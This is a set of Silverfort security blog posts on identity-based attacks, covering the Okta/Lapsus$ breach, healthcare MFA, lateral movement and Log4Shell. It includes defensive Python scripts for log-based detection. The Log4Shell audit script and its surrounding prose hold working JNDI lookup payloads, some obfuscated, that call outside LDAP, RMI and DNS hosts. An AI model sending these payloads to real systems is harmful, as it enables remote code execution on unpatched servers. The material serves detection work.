“There is no teacher but the enemy. No one but the enemy will tell you what the enemy is going to do. No one but the enemy will ever teach you how to destroy and conquer. Only the enemy shows you where you are weak. Only the enemy shows you where he is strong. And the rules of the game are what you can do to him and what you can stop him from doing to you.” (Ender’s Game, Orson Scott Card)

While the recently disclosed attack on Okta appeared to be limited in scope and impact, it nevertheless provides key insights into the critical role that compromised credentials played in this breach. Placing this breach within the overall context of today’s threat landscape reveals that user identities have become a top targeted attack surface. How should this change in the threat actors’ playbook impact our security architecture and practices so we can win against attacks that employ user accounts as their main attack vectors? In this article, we explore the key lessons that the Lapsus$ threat actors have taught us in this breach and how we can use these lessons to enhance the resilience of our environments to identity threats.

### A short recap of the Okta breach

Attackers from the Lapsus$ group managed to compromise an endpoint of a third-party support engineer via RDP. Following the endpoint’s compromise, the attackers disabled the endpoint protection agent and downloaded various tools such as ProcessHacker and Mimikatz. They then used these tools on the compromised endpoint to get credentials for the O365 account associated with a company the third-party service provider acquired in August 2021.
Once this access was obtained, the attackers created a new account and configured a rule to forward all mail to this account, potentially impacting 366 Okta customers.

### Key takeaways for security stakeholders

#### Lesson #1: Attackers target your weaknesses

So what has the enemy taught us through this breach? We believe... a lot. First and foremost we were reminded (nothing new) that the chain is only as strong as its weakest link and that attackers initially target these weak links to ultimately access what’s behind the stronger ones. Based on the attack flow we’ve described, let’s look at the weaker links the Lapsus$ threat actors targeted to launch their attack:

Weakness #1: Addition of new M&A environments. Nothing new here, but still a useful reminder. Mergers and acquisitions are an integral part of the business lifecycle. That said, there is no easy way to absorb one live IT environment into another one. While there are no easy solutions here, security teams should take a page from the attackers’ playbook and dedicate increased attention to these new portions of their networks, since they are the most likely to be targeted.

Weakness #2: Supply chain and third-party access. The modern enterprise IT environment is an ecosystem, not a standalone entity. That means that by design people are connecting to your environment from machines you don’t manage, with security practices that might not align with yours, while you remain accountable for a breach that occurs because of them. At the end of the day, the only aspect of the supply chain ecosystem that you can control is the access policy and the requirements third parties should fulfill to be trusted.

Weakness #3: Cloud resources in a hybrid environment are exposed to attacks originating from on-prem machines. At the end of the day, even if you’re cloud-native and digitally transformed, there will be non-web resources either interfacing with your environment or being an actual part of it.
The most intuitive example is the workstations your employees use to connect to SaaS applications and cloud workloads. If such a workstation is compromised, attackers can easily get their hands on the stored credentials and advance their presence, not only to additional machines on-prem but also to SaaS applications and cloud workloads.

Examining these weaknesses reveals that they are not on the magnitude of an unpatched vulnerability or misconfigured policy. They cannot be simply eliminated with the click of a button and are not the result of any security malpractice. Rather, they are inherent to the infrastructure of any IT environment.

#### Lesson #2: Compromised credentials were the attack's backbone

While each of the first two weaknesses opens the environment to several types of attacks, the third weakness, exposure of cloud resources to attacks originating from the on-prem environment, radically intensifies their impact. Compromised credentials played a dual role in this attack: first, in the initial access to the compromised machine, and second, in accessing O365. So it’s the identity-based attack vector that wove the three weaknesses into an extremely effective attack that puts at risk resources that appear to be under high protection.

#### Lesson #3: An identity attack surface can only be protected when unified

Dispersed identity protection creates blind spots. If remote access via RDP is protected by the VPN provider, SaaS login by a CASB, and internal connections between on-prem machines by an EDR, attackers will bypass them one by one. The better alternative is to centrally monitor and protect every authentication and access attempt, so that a detected risk in a user’s login to one resource enables restriction of this user’s access to all other resources as well. Every security stakeholder can take away from this analysis one simple truth: in today’s enterprise environment, identity is the key attack surface.
Our security architectures must adjust, respond, and become native to this insight if we wish to gain the upper hand in the battle against cyber attackers.

### Stopping the enemy

The Okta breach spotlights a trend that has been building in recent years. Attackers favor launching identity-based attacks, using compromised credentials to access targeted resources, and they do so because this attack vector is the least guarded in today's enterprise environment. The response from our side should be to acknowledge that identity is a critical attack surface and protect it accordingly, with real-time prevention, detection, and response to identity threats on-prem and in the cloud, applied equally to an RDP connection to a remote workstation, a web login to a SaaS application, and command-line access to an on-prem server.

### About Silverfort

Silverfort has pioneered the first Identity Threat Protection platform purpose-built for real-time prevention, detection, and response to identity-based attacks that utilize compromised credentials to access targeted resources. Silverfort prevents these attacks through continuous monitoring, risk analysis and real-time enforcement of Zero Trust access policies on every user, system, and environment on-prem and in the cloud. Learn more about Silverfort identity threat protection.

---

- Published: 2022-03-21
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/protecting-against-healthcare-ransomware-attacks-with-mfa/

Security and data breaches are a major concern for every organization, and even more so for healthcare providers. The sensitivity of healthcare and patient data and the critical need for 24/7 operation of life-supporting medical equipment are the key reasons why this vertical is extensively targeted by ransomware attacks. Additionally, the average healthcare organization lacks security resources and relies on legacy and unsecured systems.
These reasons explain why cyberattacks succeed more often in the medical field than in other industries. The healthcare threat landscape is changing as organizations deploy more cloud-based applications to improve productivity and patient care. Additionally, healthcare providers and physicians have embraced telehealth, which has increased the attack surface and the vulnerabilities healthcare organizations must defend against.

To help healthcare organizations with these security challenges, the security community has developed technologies that make identity theft increasingly difficult. The most effective of these is multi-factor authentication (MFA). Modern MFA solutions add a second factor on top of passwords and other credentials that are easy to steal or guess, and so decrease the likelihood of an attacker gaining access to organizational resources. While MFA is the ideal solution in theory, it has usability and flexibility gaps that create friction for adoption by medical professionals. To close this gap in identity access protection, Silverfort is the first solution that delivers MFA protection by communicating directly with the IAM (Identity and Access Management) solution itself, monitoring the authentication protocols, and enforcing MFA on top of them.

### Increased Attack Surface

With the rapid adoption of modern technology and applications, healthcare organizations' attack surfaces are growing by the day. More healthcare organizations are adopting cloud-based applications and services to simplify their IT operations, which also lets them increase clinical productivity and improve patient care. On the other hand, adding more cloud-based services to an existing healthcare IT architecture produces a mix of on-prem, legacy and cloud applications that increases the number of exposed attack surfaces. Additionally, one of the more recent challenges facing healthcare organizations is protecting the attack surface created by telehealth.
Telehealth has accelerated the adoption of remote working and cloud-based tools and applications. While this has been positive for both medical professionals and their patients, it comes with major security risks. It has increased the number of connected medical devices and technologies, which has been followed by a major growth in successful cyber attacks on healthcare organizations.

### Healthcare Needs More Security Staff

Security is a harsh discipline for those who don't invest in security experts and technology. The problem for most healthcare organizations starts with their personnel. Like most industries, healthcare experiences a security skill and headcount shortage. Without enough experts in place, organizations will struggle to minimize the vulnerabilities and attacks in hospital networks and medical devices while designing, implementing, and maintaining new security features.

### Healthcare and Ransomware

The healthcare threat landscape has drastically evolved over the years, and ransomware is now the attack type of choice. From an attacker's perspective, targeting healthcare organizations is financially attractive because hospitals are willing to pay ransoms to ensure that sensitive data won't be exposed. Attackers are also drawn by the fact that the healthcare industry has a weaker security posture than other industries and is seen as an easy and fruitful target. Because patient lives are placed at risk when systems fail or are down, healthcare organizations are forced into a zero-tolerance approach to downtime when a ransomware attack occurs. Beyond the ransom itself, patient data is a far richer reward for attackers; healthcare data is the most valuable kind of stolen personal information, as patient records can fetch up to $1,000 each on the dark web. As ransomware evolves, so do the drastic consequences an attack can have on healthcare organizations.
Attackers can exfiltrate sensitive data without compromising their efforts to extract a ransom. New strains of ransomware let attackers drain patient records while locking down systems at the same time. In response, healthcare providers have no choice but to invest the money and resources to ensure they won't fall victim to devastating ransomware attacks.

### MFA is the Answer

For healthcare organizations to improve their data protection, it must start at the identity level, and therefore multi-factor authentication (MFA) is the solution for protecting the identities of their employees. MFA requires users of a website or application to present additional evidence that they are who they say they are. Modern MFA solutions add this extra proof on top of passwords and other identification methods that are easy to exploit, so that a stolen password alone is no longer enough. Enterprise MFA solutions improve identity security and decrease the chance of unauthorized access to sensitive resources and records. Done well, MFA need not come at the cost of usability. Many healthcare organizations today require their employees to use a separate security key on top of a complicated password every time they log in, which complicates the process. A well-designed MFA deployment, on the other hand, streamlines login and authentication instead of adding friction for the user.

### Is MFA Right for Healthcare?

While MFA for healthcare is the ideal solution for authenticating identity, it needs to be implemented and used correctly. Traditional MFA solutions add complexity and increase the number of moving parts in the authentication process. This opens the door to authentication system failures, which defeat the entire purpose of deploying an MFA solution. While a good MFA solution shouldn't have much downtime, it can occur, and when it does it impacts user productivity.
Medical professionals typically can't afford slow authentication processes; they need a solution that logs them in instantly and authenticates their identity. Consider the badge systems most hospitals have deployed: a healthcare worker taps a badge on a reader to log in and out, and with that single tap has access to every medical system and patient record the account can reach. This creates a major security risk, since not every healthcare worker should have access to everything, and even more so if an attacker has obtained or cloned a user's badge and can suddenly move laterally. Many doctors, especially in emergency medicine, have been hesitant to adopt MFA because they are not always by their phone, but this should not hold back the entire organization. Instead, these doctors and their systems should be put into a specific security group, and the security team should create specific risk-based and behavior-based policies for them and monitor their access activity daily to ensure there is no malicious activity.

### The Solution: Unified Identity Protection Platform

To help healthcare organizations solve the different security challenges of identity access and threat protection, Silverfort has pioneered the world's first Unified Identity Protection platform, which consolidates security controls across corporate networks and cloud environments to block identity-based attacks. Silverfort seamlessly integrates with all existing MFA solutions and extends MFA to any resource and access interface across the on-prem and multi-cloud enterprise environment. This includes assets that couldn't be protected with MFA before, such as legacy medical devices and applications, IT infrastructure, and more. Silverfort analyzes the context of each user (or service account) access request, leveraging Silverfort's AI-driven risk engine. It then applies the appropriate access policy.
For example, if the risk level is high, Silverfort can step up the authentication requirements and require the user to authenticate with MFA. This process can stop an attacker from moving laterally and running a successful ransomware attack. Enforcing MFA at the identity level creates another layer of security against incoming identity attacks. Learn more about Silverfort's Unified Identity Protection platform.

---

- Published: 2022-02-23
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/lateral-movement-attacks-blind-spot/

Lateral movement attacks are effectively a blind spot in today's security stack, which cannot detect and prevent them in real time. This blind spot is the result of a long-lasting paradigm that delegates identity protection to endpoint, network, and cloud security products rather than acknowledging user identities for what they really are: a standalone attack surface that must be addressed and protected in a dedicated manner. In this article we suggest a conceptual framework to better analyze and understand this blind spot within the overall context of cyber protection, so that enterprise security stakeholders can reflect on their security stack and evaluate its exposure to lateral movement attacks.

### A Brief Lateral Movement Recap

#### Expanding Foothold from Patient Zero to Additional Machines

Lateral movement is the general term for the attack stage that follows the initial compromise of a machine (AKA patient zero): accessing and executing code on additional machines in the environment. Performing lateral movement is a key necessity for the attacker, since in most cases patient zero, while more vulnerable than other machines in the environment, cannot by itself satisfy the attack's objectives. Hence the need to access additional machines and form a path to fulfill those objectives.
#### Compromised User Credentials are Lateral Movement's Key Enablers

But how does movement from machine to machine take place? In an enterprise environment there is essentially one way to do this: log in with user credentials. Hence, what typically follows the patient-zero compromise is a search for the user accounts that are logged in to the machine and their credentials (a relatively trivial task that many open-source tools and either CMD or PowerShell scripts can perform). The attacker can then use various admin tools to enumerate other machines in the environment and attempt to log in to them with the newly obtained credentials. Once successful, the process is repeated on the next machine, and so on. A common thread in many attacks is the hunt for admin credentials, as these carry higher access privileges and access to the Domain Controller.

In terms of risk and potential damage, it is easy to see that lateral movement is the key component in turning a cyberattack from a local event into an enterprise-grade incident. However, despite the significant advances made in cybersecurity during the past decade, lateral movement is still a blind spot in the enterprise security stack, creating a critical security gap. Let's reflect on the key concepts of cybersecurity detection and prevention to understand why.

### Attack Detection 101: The Anomaly Factor

In most cases, malicious activity differs from legitimate activity. To detect malicious activity, the essential question is: what anomaly does it generate? In some cases the anomaly is easy to track, for example a file signature that has already been flagged as malicious, or network traffic to an external IP known to be malicious. But threat actors continuously refine and enhance their tools, striving to eliminate, or at least minimize, these anomalies as much as possible.
So we often see attacks that consist of completely normal activity in one aspect but are anomalous in another. For example, a memory corruption exploit of a vulnerability in Chrome doesn't trigger a file anomaly, since it hijacks the already running Chrome process. However, the process behavior in memory and its interaction with the OS differ radically from the normal Chrome execution flow.

### Attack Detection 102: The Multi-Aspect Factor

But what do we mean when we talk about aspects? We can think of aspects as different perspectives on a single activity. Take a typical scenario of a malicious payload that executes, opens an outbound connection to a remote server, and downloads an additional file. The endpoint protection aspect looks for anomalies in process behavior and file signatures, while the network protection aspect looks for anomalies in the network traffic. A sound security stack includes as many aspects as possible to increase the chances of detecting malicious activity. Single-aspect protection is bound to fail, because there are attack vectors that are, by definition, legitimate in one aspect and malicious in another. The simplest example is C2 (command-and-control) communication. There is no anomaly in the file or process that opens the connection, since it is the same one the operating system uses for any other legitimate connection. So if we relied only on the endpoint aspect, this activity would most probably go undetected. However, the network aspect, which is concerned with network traffic, would easily determine that the destination address is malicious and block the connection altogether.

### Attack Prevention 101: The Real-Time Factor

Detecting malicious activity is the first step. However, the actual security value is delivered by the ability to prevent or block the detected malicious activity in real time.
In that manner, an Endpoint Protection Platform (EPP) can not only determine that a running process exhibits malicious behavior but also terminate that process's execution in real time. Similarly, a firewall can both determine that certain network traffic is malicious and block it altogether. Let's see now how the anomaly, aspect and real-time factors map onto lateral movement protection.

### Lateral Movement Attacks and the Identity Attack Surface

The reason lateral movement attacks are a blind spot is that endpoint and network security controls do not possess the aspect required to detect the anomalies such attacks entail, and do not have the ability to block them in real time. Let's dive deeper to understand why.

#### Lateral Movement is an Identity-Based Attack

Lateral movement attacks are carried out by providing valid (yet compromised) user credentials to log in to resources (servers, workstations, apps, etc.) in the targeted environment. This introduces a severe detection challenge, because an authentication performed by an attacker moving laterally is essentially identical to one made by a legitimate user. Both entail an authentication process in which credentials are passed to an identity provider (for example Active Directory), which validates them and grants or denies access based on this validation. In that manner, a lateral movement attack is at its core a series of authentications that utilize the legitimate authentication infrastructure for malicious purposes.

#### Lateral Movement Detection Challenge #1: A Low Anomaly Factor

This means that we are dealing with a very low anomaly factor to begin with. The only difference between a malicious authentication and a legitimate one is that the first is performed by an attacker and the second by a legitimate user.
That doesn't leave much anomaly margin to work with, since the anomaly is not found in the authentication itself but in its surrounding context. Let's understand why uncovering this context is beyond the scope of the endpoint and network protection aspects.

#### Lateral Movement Detection Challenge #2: Endpoint and Network Aspects Mismatch

As previously explained, lateral movement is a series of malicious authentications from a compromised machine to another one. The endpoint protection aspect is not effective at determining that such an authentication is malicious, because it is focused on anomalies in file and process execution, and that aspect cannot reveal any anomaly because of the resemblance we've described. If, for example, an attacker chooses to employ the PsExec tool to connect remotely from patient zero to another machine with a set of compromised credentials, the launched process will be PsExec.exe on the source (and the PSEXESVC service it installs on the target), which is exactly what would appear had a legitimate admin chosen to perform the same connection. The network protection aspect falls short in detecting lateral movement for the same reason: the network traffic from patient zero to the new machine is indistinguishable from the traffic a legitimate helpdesk session would generate when remotely troubleshooting an endpoint issue for an employee.

#### Lateral Movement Prevention Challenge #3: The Lack of a Real-Time Factor within Endpoint and Network Solutions

Let's assume we've managed to partly overcome the detection difficulties. There is still a critical challenge to solve: the lack of real-time prevention capabilities in both endpoint and network protection products. Even if the EPP somehow manages to determine that an executed process implies, without any doubt, that a lateral movement attack is taking place, it has no control over the authentication itself: by the time the process is observed, the credentials have already been validated by the identity provider.
While in theory a network solution might be able to provide this prevention with tight segmentation of the environment, in practice it won't prevent lateral movement within the compromised segment itself, nor will it block compromised admin users, who are typically exempt from the segmentation's limitations. In fact, the only component in the enterprise IT stack that can prevent lateral movement in real time is the identity provider itself, which in most on-prem environments is Active Directory.

### Active Directory Detection and Prevention Gaps

AD governs the authentication process itself and determines whether an access request to a resource is granted or denied. If real-time prevention against lateral movement is to be found anywhere, it is there. However, a fundamental limitation stops AD from performing this real-time protection task: the only security check AD can perform is to validate that the presented credentials match the account. In the case of lateral movement this is no use, because the match exists (that is the whole purpose of compromising the credentials in the first place). So the potential for real-time protection can't be fulfilled, because AD will never know when to apply it.

### Conclusion: Lateral Movement Protection Dead End

To summarize, endpoint and network protection can't efficiently detect lateral movement attacks and don't have the ability to prevent them. Active Directory lacks the ability to discern between a lateral movement attack and a legitimate authentication, which leaves its protection potential dormant. This is the main reason most organizations architect their security stack to prevent the attack stages that come before lateral movement and to reactively minimize its damage after detection. But lateral movement itself is not contained or addressed.
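The argument above says the anomaly of a lateral movement logon lives in its context, not in the credential check. The following is an added illustration of what that context-based detection looks like in practice; it is not Silverfort code and not a product feature. It runs over constructed logon records whose fields loosely mirror a Windows Security event 4624 (account, source workstation, target host, logon type), with invented host and account names, and applies three rules: an account authenticating from a source host never seen in a known-good baseline, a service account used from a computer outside an assumed allow-list, and one account fanning out to many distinct hosts within a short window. This is after-the-fact detection over a log; it does not deliver the real-time prevention the post argues only the identity provider can provide.

```python
"""Context-based detection of lateral movement in authentication logs.

Added illustration, not Silverfort code. The credential check itself is
identical for attacker and victim, so every rule below looks at the
context around the logon instead: which host the account came from,
how many hosts it reached, and whether a service account left the
computers it is known to run from.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed records modelled loosely on the fields of a Windows Security
# event 4624: (timestamp, account, source workstation, target host, logon
# type; 3 = network logon). Hosts and accounts are invented.
BASELINE = [  # a known-good period used to learn normal behaviour
    ("2022-02-14T09:02:00", "j.doe",      "WS-JDOE",    "FS01",   3),
    ("2022-02-14T09:05:00", "j.doe",      "WS-JDOE",    "MAIL01", 3),
    ("2022-02-15T10:12:00", "j.doe",      "WS-JDOE",    "FS01",   3),
    ("2022-02-14T08:30:00", "adm.smith",  "ADMIN-JUMP", "FS01",   3),
    ("2022-02-15T14:01:00", "adm.smith",  "ADMIN-JUMP", "DC01",   3),
    ("2022-02-14T02:00:00", "svc_backup", "BACKUP01",   "FS01",   3),
    ("2022-02-15T02:00:00", "svc_backup", "BACKUP01",   "FS02",   3),
]
TODAY = [  # patient zero is WS-JDOE; the attacker harvested adm.smith's creds there
    ("2022-02-16T09:01:00", "j.doe",      "WS-JDOE", "FS01", 3),
    ("2022-02-16T11:40:00", "adm.smith",  "WS-JDOE", "FS01", 3),
    ("2022-02-16T11:41:00", "adm.smith",  "WS-JDOE", "FS02", 3),
    ("2022-02-16T11:41:30", "adm.smith",  "WS-JDOE", "FS03", 3),
    ("2022-02-16T11:42:00", "adm.smith",  "WS-JDOE", "DB01", 3),
    ("2022-02-16T11:43:00", "adm.smith",  "WS-JDOE", "DC01", 3),
    ("2022-02-16T11:50:00", "svc_backup", "WS-JDOE", "FS02", 3),
]
# Assumed allow-list: the only computers each service account may operate from.
SERVICE_ACCOUNT_HOSTS = {"svc_backup": {"BACKUP01"}}


def parse(record):
    ts, account, source, target, logon_type = record
    return {"time": datetime.fromisoformat(ts), "account": account.lower(),
            "source": source.upper(), "target": target.upper(),
            "logon_type": logon_type}


def build_baseline(records):
    """Per-account set of source hosts observed during the known-good period."""
    sources = defaultdict(set)
    for ev in map(parse, records):
        sources[ev["account"]].add(ev["source"])
    return sources


def detect(records, baseline, window=timedelta(minutes=10), fanout=5):
    """Return a de-duplicated list of (rule, account, detail) alerts.

    new-source        account authenticated from a host never seen in the baseline
    service-off-host  service account used from a computer outside its allow-list
    fan-out           account reached >= `fanout` distinct hosts within `window`
    """
    alerts, reported = [], set()
    recent = defaultdict(deque)  # account -> (time, target) pairs inside the window

    def report(alert):
        if alert not in reported:
            reported.add(alert)
            alerts.append(alert)

    for ev in sorted(map(parse, records), key=lambda e: e["time"]):
        acct, src = ev["account"], ev["source"]
        if acct in SERVICE_ACCOUNT_HOSTS:
            if src not in SERVICE_ACCOUNT_HOSTS[acct]:
                report(("service-off-host", acct, src))
        elif src not in baseline.get(acct, set()):
            report(("new-source", acct, src))
        q = recent[acct]
        q.append((ev["time"], ev["target"]))
        while ev["time"] - q[0][0] > window:  # slide the window forward
            q.popleft()
        targets = sorted({t for _, t in q})
        if len(targets) >= fanout:
            report(("fan-out", acct, ",".join(targets)))
    return alerts


if __name__ == "__main__":
    for alert in detect(TODAY, build_baseline(BASELINE)):
        print(*alert)
```

On the constructed day the three rules fire for the admin account now used from the employee workstation, for the same account reaching five servers in three minutes, and for the backup service account leaving its backup server; the employee's own logons, which are the only ones the credential check would also have seen as normal, raise nothing. The baseline learning window, the fan-out threshold and the allow-list are the tuning knobs, and in a real environment they are derived from weeks of logs rather than two days.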
### The Silverfort Way: Lateral Movement Real-Time Prevention with MFA

The Silverfort Unified Identity Protection platform is the first solution to deliver seamless real-time prevention of lateral movement attacks by natively integrating with Active Directory to add a security layer of both risk analysis and Multi-Factor Authentication (MFA). To learn more about Silverfort's capabilities, visit our Lateral Movement Prevention Protection page or schedule a demo with one of our experts.

---

- Published: 2021-12-16
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/are-you-ready-for-stage-2-of-the-log4shell-attacks/

The full impact of the newly discovered Log4Shell zero-day is yet to be determined. Many organizations have hurried to patch their servers, making them immune to the mass exploitation that has been reported. However, patching your servers alone is not enough to ensure this critical attack surface is covered. While running the updated Log4j version does secure against future exploitation, you should also address the possibility that some servers were compromised before the patch was applied. In this article we explain how feasible this scenario is and follow up with actionable recommendations to proactively mitigate it.

### Log4Shell In-the-Wild Activity Recap

Apache Log4j is an open-source, Java-based logging utility widely used by enterprise applications. The initial reports on Log4Shell (CVE-2021-44228) date to December 9, 2021. These reports were quickly followed by extremely rapid development of new exploit variants, over 60 within less than 24 hours of the original. Within those same 24 hours, attacks on organizations worldwide surged, with various security providers reporting that vast portions of their customers were targeted by attackers attempting to exploit the vulnerability.
The exploit has since been rapidly integrated into the arsenal of common malware and is also reported to be in use by advanced nation-state attack groups.

### Assume Breach: Attacked Until Proved Otherwise

The enormous volume of these attacks presents a challenge to any security stakeholder who has patched their vulnerable servers. The rapid development and usage pace of the exploit means there is at least a non-negligible probability that your servers were targeted before the patching took place. We strongly believe that security best practice in this case is to act as if your servers have been compromised until this threat is reliably disproven. Let's review the various implications of such a compromise in order to understand how to confront this threat efficiently.

### Possible Stage 2 Threat Scenarios Following a Silent Compromise

#### Laying Low Until the Time is Right

Log4Shell by itself enables attackers to establish an initial foothold in your environment. This foothold is not the attackers' goal but an essential preliminary stage. That means that if attackers have indeed exploited the vulnerability and gained a presence on one of your web-facing servers, they have no incentive to draw attention to themselves. Rather, they are more likely to operate low and slow, harvesting additional credentials and perhaps expanding to additional machines in your network before attempting to execute the attack's actual objective. Judging from the common exploits we see, there is a good chance this objective is a ransomware attack that would shut down your operations, but it can also be theft of your intellectual property or of your employees' or customers' PII.

#### Sell the Access

Alternatively, the attacker may not utilize the access themselves. Rather, they could sell their server access to a third party on the dark web.
#### End Result: Exposure to Lateral Movement and Ransomware Propagation

One way or another, there may very well be attackers with the keys to your kingdom, namely the usernames and credentials of your standard and admin users. This is bad because, while the initial compromise damages a single machine, it is lateral movement that turns a local event into an enterprise-wide risk, and compromised credentials are exactly what enables it.

#### The Christmas Effect

Let's not forget that attackers typically opt for holidays and weekends. The coming Christmas holidays are an especially bad time for your employees' credentials to be in the wrong hands. We believe attackers of both types described above will stay silent in the meantime, waiting for the right hour, and Christmas can be the perfect timing.

### Silverfort Best Practice Recommendations for Compromised Credentials

In light of all the above, we've compiled a set of actionable best practices to proactively confront the possibility that some of your servers were, and maybe still are, compromised by attackers who exploited the Log4Shell vulnerability:

- Patch end-to-end. Ensure that all vulnerable systems are patched, with special attention to your internet-facing servers. Isolate the applications you can't patch, both at the network level and at the identity layer.
- Prevent attackers from using the compromised credentials for further malicious access. Require MFA for all admin accounts on all resources in the environment. Also ensure that MFA protection applies to every access interface, including command-line utilities such as PsExec, PowerShell etc., and not just to RDP and desktop login.
- Restrict service accounts to operate only from permitted computers. Base this on these accounts' predictable and repetitive behavior.
- Monitor your environment closely for suspicious and malicious events, such as a surge in simultaneous access requests from a single user or any other deviation from a user account's standard activity.

Following these recommendations will greatly increase your resilience to a pre-existing Log4Shell-based compromise and deny attackers the ability to leverage stolen credentials for further malicious access. The Silverfort Unified Identity Protection platform enables its users to extend Risk-Based Authentication and MFA to any user, service or system, providing proactive protection against identity-based attacks that utilize compromised credentials to access targeted resources. This includes end-to-end MFA protection, as well as continuous monitoring of all authentications both on-prem and in the cloud. Learn more about Silverfort here.

---

- Published: 2021-12-12
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/monitoring-for-log4j2-exploits-with-silverfort/

Apache Log4j is an open-source, Java-based logging utility widely used by enterprise applications. The security community recently discovered a new Log4j vulnerability (CVE-2021-44228) that allows a remote attacker who controls logged fields in some applications to exploit Log4j to execute code remotely on the target application. For example, an attacker can cause an application to log a field that contains a string of the form ${jndi:ldap://example.com/a}. When the application logs that string, Log4j's JNDI lookup makes it reach out to the URL ldap://example.com/a to load an object. If the attacker controls example.com, they can use this vulnerability to load an object of their choice into the application's memory. This vulnerability has been compared to Heartbleed and Shellshock due to its wide impact. A large share of Java applications use log4j2 for logging, so a wide array of applications and systems in your environment may be affected.
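The lookup mechanism just described is what an audit of logged fields has to find, and in-the-wild payloads rarely contain the literal "${jndi:" marker: they hide it behind nested Log4j lookups such as ${lower:...}, ${upper:...} and the ${key:-default} form. The following is an added example of such an audit over log lines, written for this page; it is not Silverfort code, not part of Log4j, and the "key=value" log format, field names and sample lines are constructed (the IPs are documentation ranges). It normalizes the three obfuscation forms from the inside out, the way Log4j's substitution resolves them for these common cases, and then matches the result. Anything it does not understand is replaced with a neutral placeholder, so the check is best-effort and is never a substitute for patching.

```python
"""Audit authentication logs for Log4Shell lookup strings.

Added illustration, not Silverfort code. Nested lookups are resolved from
the innermost one outward until a jndi lookup surfaces; unknown lookups
(${env:...}, ${sys:...}) become a <placeholder> so the scan still
terminates and the surrounding text is preserved.
"""
import re

INNERMOST = re.compile(r"\$\{([^${}]*)\}")          # a lookup with no nested lookup
JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)

# Constructed log lines in an assumed "key=value" format; the IPs are
# documentation ranges and the payloads are shapes seen in the wild.
SAMPLE_LOG = [
    '2021-12-11T03:14:10Z login ok     user="alice" src=203.0.113.5',
    '2021-12-11T03:14:15Z login failed user="${jndi:ldap://198.51.100.7:1389/a}" src=203.0.113.9',
    '2021-12-11T03:14:16Z login failed user="${${lower:J}ndi:${lower:RMI}://198.51.100.7:1099/x}" src=203.0.113.9',
    '2021-12-11T03:14:17Z login failed user="${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/z}" src=203.0.113.9',
    '2021-12-11T03:14:20Z login failed user="${env:HOME}" src=203.0.113.12',
    '2021-12-11T03:14:25Z login ok     user="bob" note="cost ${dollar} 5" src=203.0.113.5',
]


def normalize(text):
    """Resolve nested lookups from the inside out until a jndi lookup surfaces."""
    s = text
    for _ in range(text.count("${")):        # each round removes one "${...}"
        m = INNERMOST.search(s)
        if m is None:
            break
        body = m.group(1)
        low = body.lower()
        if low.startswith("jndi:"):
            break                             # keep it intact for the JNDI match
        if low.startswith("lower:"):
            rep = body[len("lower:"):].lower()
        elif low.startswith("upper:"):
            rep = body[len("upper:"):].upper()
        elif ":-" in body:                    # ${unknownKey:-default} -> default
            rep = body.split(":-", 1)[1]
        else:                                 # unsupported lookup: neutral placeholder
            rep = "<" + body + ">"
        s = s[:m.start()] + rep + s[m.end():]
    return s


def classify(text):
    """Return the JNDI protocol (ldap, rmi, dns, ...) if `text` carries a lookup, else None."""
    m = JNDI.search(normalize(text))
    return m.group(1).lower() if m else None


def audit(lines):
    """Map every log line that carries a jndi lookup to (1-based line number, protocol)."""
    hits = []
    for n, line in enumerate(lines, 1):
        proto = classify(line)
        if proto:
            hits.append((n, proto))
    return hits


if __name__ == "__main__":
    for n, proto in audit(SAMPLE_LOG):
        print(f"line {n}: jndi lookup via {proto}")
```

Lines 2, 3 and 4 of the sample are reported as ldap, rmi and dns lookups respectively, while the harmless ${env:HOME} and ${dollar} lines are not. Scanning the whole line rather than only the username field costs nothing and catches payloads delivered through other logged headers or parameters.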
There are multiple reports of mass exploitation of this vulnerability in the wild, with a rapidly growing number of exploit variants; more than 60 appeared within 24 hours of the vulnerability's initial disclosure. Silverfort has reviewed its code and found no vulnerable usage of log4j2 by the product. According to Cloudflare, the vulnerability is already being exploited in the wild, and attackers often use the username field to deliver the payload. This makes sense, because the username field is often logged for unsuccessful authentication requests. Silverfort monitors all authentication requests in the environment and can be used to audit for these Log4Shell exploits by reporting on the use of the "${jndi:" string in authentication requests. Security teams are advised to update their software as soon as possible and to check whether their vulnerable servers were compromised before the patch.

---

- Published: 2021-11-28
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/bring-order-to-identities-while-transitioning-to-cloud/

Your enterprise is transitioning to a hybrid network. Maybe it already has. This is great news, but it also presents a challenge. Enterprises have traditionally used identity and access management (IAM) solutions to manage users and assets. These solutions can be very different for cloud and web-based apps, on-premises systems, privileged access and perimeter access. This leaves enterprises with a collection of disparate identity solutions that cannot talk to one another. The resulting identity silos each solve only one piece of the puzzle and deliver varying degrees of security control, visibility and user experience. Because there is no single standard for identity management systems to interoperate, no one had come up with a way of centralizing secure user authentication and resource access across all these IAM components. Until now.
Silverfort has tackled this issue head-on by developing the only platform that can truly orchestrate identity and authentication management across hybrid-cloud environments. It is based on a concept known as unified identity protection, which centralizes the protection of all human and machine identities within a single platform. Benefits of Silverfort's solution include:

- Clear visibility into the behavior of users across hybrid networks. A consolidated audit trail that tracks activity across both on-premises networks and cloud environments provides better context and improved detection of anomalies and malicious behavior patterns.
- Extending modern cloud IAM protections to legacy on-premises resources. Multi-Factor Authentication (MFA) makes it difficult for attackers to access protected resources even when they have stolen valid user credentials. But not all identity solutions offer this control; on-premises directories, for example, cannot. With Silverfort, any asset residing within the network can be secured with MFA.
- Applying conditional access and risk-based authentication policies to on-premises IAM directories. Until now, the kinds of capabilities available from modern cloud IdPs have not been available for on-premises IAM directories. Today's threat landscape requires secure authentication and access both inside and outside the network perimeter to prevent compromise and data theft, which is one of the key elements of any zero trust security strategy.
- Providing a better user experience. A unified approach to IAM not only provides a consistent, less confusing experience but also means that users no longer have to authenticate multiple times, each with a different sign-in method, just because they are accessing resources that happen to be managed by different IAM solutions.
